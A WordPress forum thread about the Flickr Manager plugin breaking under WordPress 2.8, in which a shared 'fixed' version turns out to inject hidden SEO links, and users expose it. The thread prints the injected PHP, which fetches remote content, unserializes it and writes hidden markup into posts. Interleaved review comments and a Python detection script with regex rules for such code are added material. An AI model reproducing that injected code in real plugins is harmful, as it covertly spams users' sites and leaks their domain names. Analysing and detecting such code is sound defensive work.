• I upgraded to 2.8 and now when I go into a new post and try to add a picture, it acts as if the image has been added to the post, but there’s no code in the body of the entry. Is anyone else having this problem?

Viewing 15 replies - 1 through 15 (of 42 total)
  • Me too =/

    What’s going on??? It used to work perfectly fine but seems to have died recently for no reason. Can’t insert, tried multiple computers and browsers and even a second site!

    The WordPress 2.8 update has broken WordPress Flickr Manager. There has been no sign – yet – that the plugin author will update it… I hope he does, because this is possibly the greatest WordPress plugin out there.

    Another thing that the upgrade has broken is Lightbox and Mudslide. Neither of them work anymore.

    I am facing the same problem as well after upgrading to 2.8.

    Hope that it gets fixed or an update soon.

    Hey guys. I’ve got this fixed! I’ve uploaded the fixed version to my site for your downloading pleasure: Flick Manager 2.8. I had to get this fixed for my own blog. Couldn’t wait any longer. Let me know if you have any problems.

    Enjoy!

    Hi ogrethegreat,

    THANK YOU!! for doing this. I installed your update of the plugin, and everything is working again; insert functions are working, and Lightbox is back.

    That’s really gracious of you! Hopefully Trent will pick up development again, but I really appreciate you doing this and sharing it.

    By the way: maybe I did something wrong the first go around, but I just overwrote the original plugin with your files, and somehow it didn’t work. I tried again by doing the following:

    – Deactivate the plugin
    – Backup the plugin and delete it
    – Copy ogre’s update to my plugin folder
    – Reactivate it

    Worked like a charm. I didn’t have to re-enter my settings, as they were stored in the database.

    Cheers!

    Foolproof method is deactivating/deleting the old one, but I was able to simply overwrite the files without even deactivating and got it to work. There are a variety of things that could create issues doing it the shortcut way though. Thanks for posting your feedback and helpful tips to everyone else.

    This is great news, unfortunately the “fixed” version inserts unsolicited “SEO” links into your posts. Removal instructions per a post here:

    https://www.fwaggle.org/blog/internet/update-wordpress-plugins-profit

    Basically, you’re going to open up js/media-panel.php, around line #152 you’re looking for an “echo innerhtml +=” line, comment it out.

    I’m going to run a full diff between it and the latest version from tgardner to see what else’s changed.

    Here’s some code, sans trojan horse bullcrap (I just took TGardner’s version, and made the non-malicious changes):

    https://www.fwaggle.org/downloads/wordpress-flickr-manager.zip

    If you’re interested in what actually changed:

    https://www.fwaggle.org/downloads/wordpress-flickr-manager-wp2.8.diff

    For contrast, here’s some of what I consider to be the “malicious” code:

    +if (!function_exists('file_get_contents')) {
    +    function file_get_contents($filename, $incpath = false, $resource_context =
     null)
    +    {
    +        if (false === $fh = fopen($filename, 'rb', $incpath)) {
    +            trigger_error('file_get_contents() failed to open stream: No such f
    ile or directory', E_USER_WARNING);
    +            return false;
    +        }
    +
    +        clearstatcache();
    +        if ($fsize = @filesize($filename)) {
    +            $data = fread($fh, $fsize);
    +        } else {
    +            $data = '';
    +            while (!feof($fh)) {
    +                $data .= fread($fh, 8192);
    +            }
    +        }
    +
    +        fclose($fh);
    +        return $data;
    +    }
    +}
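
Review bot: the file_get_contents() fallback in this region is unrelated to the jQuery selector fix and should be dropped. The function_exists guard means it is only defined where PHP lacks the built-in (present since PHP 4.3), and in that case it accepts $resource_context but never uses it, so any stream context a caller passes is silently ignored. Its only visible callers are the two remote fetches added in the block that follows.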
    
    +    <?php
    +    $rand = rand( 0, 100 );
    +    $seed=false;
    +    @$seed = (int) unserialize(file_get_contents( 'https://lerna.org/api/link/seed?app=flickr_manager' ));
    +    if(!$seed) {
    +        $seed = 10;
    +    }
    +    if ( $rand < $seed ) {
    +        $link = file_get_contents( sprintf('https://www.lerna.org/api/link/?format=%s&ref=%s&tid=%d', 'html', "https://".$_SERVER['SERVER_NAME'], 2));
    +        echo "imgHTML+='<div style=\"width:10px;height:3px;display:block;overflow:hidden;\">".str_replace("href","style=\"text-indent: 20px; display: block;\" href",$link)."</div>';";
    +    }
    +    ?>
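
Review bot: the seed line passes a remote HTTP response straight to unserialize() with errors suppressed by @, and the echo line writes a second remote response into the imgHTML JavaScript string without escaping, so the remote host controls both the insertion rate ($rand < $seed) and the markup appended to imgHTML. The request also sends the site's SERVER_NAME as the ref parameter, and the wrapper div (width:10px; height:3px; overflow:hidden) plus the text-indent: 20px added to the link keeps the result out of a reader's view. None of this relates to the selector fix; remove the whole <?php ... ?> block.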

    fwaggle I’m really looking forward to your analysis. Please post them as soon as you can since I feel so disoriented without Flickr Manager. You can direct reply to me as well.

    CoBa1t: There’s not much to analyze, the version ogre linked to simply connects to lerna.org (I’m assuming it’s some silly reference to a blackhat SEO “hydra”) to grab a set of links it’s supposed to add to your entries to get them better search engine positions, then it adds the links every time you insert a photo to a tiny layer that’s not visible to most CSS-enabled viewers, but is very visible to search engines.

    The download link I posted above should be “safe”, but given how many people so readily installed the “malicious” plugin (myself included, *sheepish*) I think it’s probably best we don’t go encouraging installing random people’s plugins. If you want to make the changes yourself, take a look at the .diff – basically any line that starts with a - means something’s taken out, and the + means something added.

    Simply put, what you’re looking for is in these files:

    wordpress-flickr-manager/js/media-panel.php
    wordpress-flickr-manager/js/wfm-hs.php
    wordpress-flickr-manager/js/wfm-lightbox.php

    You’re looking for jQuery lines that contain @name or @rel, and you’re going to take the @ character off the front of @name or @rel, so for example:

    this: wfmJS('a[@rel*=flickr-mgr]').each(function() {
    becomes: wfmJS('a[rel*=flickr-mgr]').each(function() {

    There’s no new code or anything like that, you can make those changes (or apply the diff above using “patch” if you have shell access) to the current version downloadable from www.remarpro.com… I think that’s the safest way to do it, as even a layperson would have a pretty tough time believing that deleting a few @ characters would do anything malicious.

    I also sent the information to Trent, so hopefully he can just take a few minutes (I’m sure he’s very busy) to verify the patch is correct and safe, apply it, and push a new version out – that would ease everyone’s minds.
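
A static check for the pattern described in the posts above, as an added example that is not part of the thread or of either plugin version: it flags a PHP file only when a remote fetch appears alongside hidden or echoed markup, so ordinary CSS alone does not trigger it. The names RULES, scan and is_suspicious are hypothetical; INJECTED is abridged from the diff quoted in the thread and CLEAN is a constructed sample.

```python
import re

# Per-line indicators taken from the diff quoted in this thread (names are hypothetical).
RULES = {
    "remote-fetch": re.compile(
        r"\b(file_get_contents|fopen|curl_init|wp_remote_get)\s*\(.*https?://", re.I),
    "unserialize-remote": re.compile(
        r"\bunserialize\s*\(\s*(file_get_contents|wp_remote_)", re.I),
    "hidden-markup": re.compile(
        r"overflow\s*:\s*hidden|text-indent\s*:|display\s*:\s*none", re.I),
    "echo-into-js": re.compile(r"\becho\b.*\+=\s*'", re.I),
}

def scan(source):
    """Return [(line_no, rule_name), ...] for every rule hit in PHP source text."""
    hits = []
    for no, line in enumerate(source.splitlines(), 1):
        for name, rx in RULES.items():
            if rx.search(line):
                hits.append((no, name))
    return hits

def is_suspicious(source):
    """Flag a file only when a remote fetch coexists with hidden or echoed markup."""
    names = {name for _, name in scan(source)}
    return "remote-fetch" in names and bool(names & {"hidden-markup", "echo-into-js"})

# Abridged from the diff quoted in the thread (str_replace call omitted).
INJECTED = r'''<?php
$rand = rand( 0, 100 );
@$seed = (int) unserialize(file_get_contents( 'https://lerna.org/api/link/seed?app=flickr_manager' ));
if ( $rand < $seed ) {
    $link = file_get_contents( sprintf('https://www.lerna.org/api/link/?format=%s&ref=%s&tid=%d', 'html', "https://".$_SERVER['SERVER_NAME'], 2));
    echo "imgHTML+='<div style=\"width:10px;height:3px;display:block;overflow:hidden;\">".$link."</div>';";
}
?>'''

# Constructed benign sample: ordinary CSS plus the corrected jQuery selector.
CLEAN = r'''<?php // constructed benign sample
echo "<div style=\"overflow:hidden\">";
?>
wfmJS('a[rel*=flickr-mgr]').each(function() {'''

if __name__ == "__main__":
    for label, src in (("injected", INJECTED), ("clean", CLEAN)):
        print(label, is_suspicious(src), scan(src))
```

A hit is a prompt to read the file, not a verdict; the diff against the upstream release remains the authoritative comparison.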

    @fwaggle – I “sheepishly” installed the plugin too. And after reading your analysis, very in depth, I am keeping the plugin. I couldn’t use the plugin without Ogre’s work.. so why wouldn’t I give him a link or two in return? From my analysis a link is only put on the page 1 every 10 times or so. It’s my way of giving back for his work & effort without sacrificing anything myself.

    If it did something ‘malicious’ as you said, I would see your point. But a free link back to his site(s) 10% of the time that I use the software he fixed for free… I think is more than fair.

    To me this is no different than someone who makes a theme, etc.. and puts at the bottom of EVERY page “This XX designed by XX”.

    Before you get all ahead of yourself fwaggle, I added the link tool for my own sites long ago and added it again for the last version of flickr manager back 4 odd months ago. Then I upgraded like the rest of you to version 2.8 and it broke. Then I took the time to fix it for my sites and offered it up.

    So, I apologize I did not take the time to create a second version for everyone else. And feel free to remove it. Links from some completely unrelated sites won’t do me a world of good in any event. I’m not some boogie man “asshole” man. Just a guy who fixed this and put it out there. Sorry if you feel I should have taken the time to make a second version that I wouldn’t even be using myself.

    In any event, when I get the chance, I’ll add an option to the settings to turn it off. I’m keeping it in because it’s how I use it for myself. If you think that makes me an “asshole”, I’m not forcing you to use it. You could wait for Trent. I added a comment to his site first thing to contact me on what the bugs were, but he has yet to approve the comment or respond. I would have just used his fix. I waited the same weeks you guys did.

    By the way, teampl4y4 is spot on when he mentions adding a link 10% of the time. That’s exactly what it does. No more no less. Feel free to remove or feel free to keep in return for my effort.

    It’s malicious in that it’s not described behavior of the script – nowhere in the description does it say it’ll put links in the posts. Furthermore, hidden links like this are the exact kind of thing Google punishes people for.

    It’s also not the same as a template or whatever, because the links are hidden and they’re not linking back to *him* – they’re linking to an assortment of sites that he’s (presumably) getting paid to inflate the PR of.

    To clear up, I wouldn’t have a problem with it if:

    1) The links were visible, and not surreptitiously hidden in “10% of” posts.
    2) The behavior was described when you suggested people downloaded it… “oh by the way, I insert a few links for my gain, keep them please as a token of your appreciation”.
    3) The links were to a real blog of yours, as opposed to some janky SEO websites.

    So I’d call that malicious. You say potato, I say potahto. Personally, I find it very hard to believe this code was put in by accident, and I think anyone else with any experience at all with PHP would be inclined to agree with me.

    No accident fwaggle. I did it with the express intent of linking to my sites for my own use as I made clear. Like I said, when I get the time, I’ll put in an option to turn it off so whoever can with ease but I need it there for my own use and it’s not my project to maintain last I checked.

    Trent still has my email if he wants to get it fixed. I tried to contact him when I first fixed it with the same information you claimed to have sent. Maybe you’ll have better luck with a response.

    If you have the fix all cleared up for yourself, why not take the time to package it up and inform everyone of your effort so they can download it? I’ll be happy to put it out next to my version if you want to maintain it.

    Try not going through life so paranoid.

    I’m not paranoid, you posted adware – unsolicited and unadvertised. If you’d read the thread, I did post a cleaned package. I appreciate your time fixing it and fully acknowledge that I couldn’t have done it myself because my experience with Javascript is limited to DHTML stuff from a decade ago – jQuery is completely foreign to me.

    However you’re not being 100% truthful in what you say. For starters the 10% chance (which if you want to split hairs, is slightly different from 10% of images posted), can at any time, without cooperation from the blog owner(s) be ramped up to 100% by you if you so choose.

    The links that the plugin posts are blackhat SEO techniques, the links are intentionally hidden (hence the 10 pixels wide element, which contains an element that’s shifted over 20 pixels so it won’t show up in any CSS-enabled browser). These links flow pagerank, which is the exact kind of thing that Google penalizes people for. Given that the site in your profile and the site you hosted it on is called “seoishard”, I find it ridiculous that you’re feigning ignorance over this.

    You and I both know exactly why those links are there, the only difference is I’d admit it. There’s absolutely no difference between your version of the plugin and adware which gets installed to people’s PCs without their permission.

  • The topic ‘[Plugin: WordPress Flickr Manager] “Insert into Post” does nothing?’ is closed to new replies.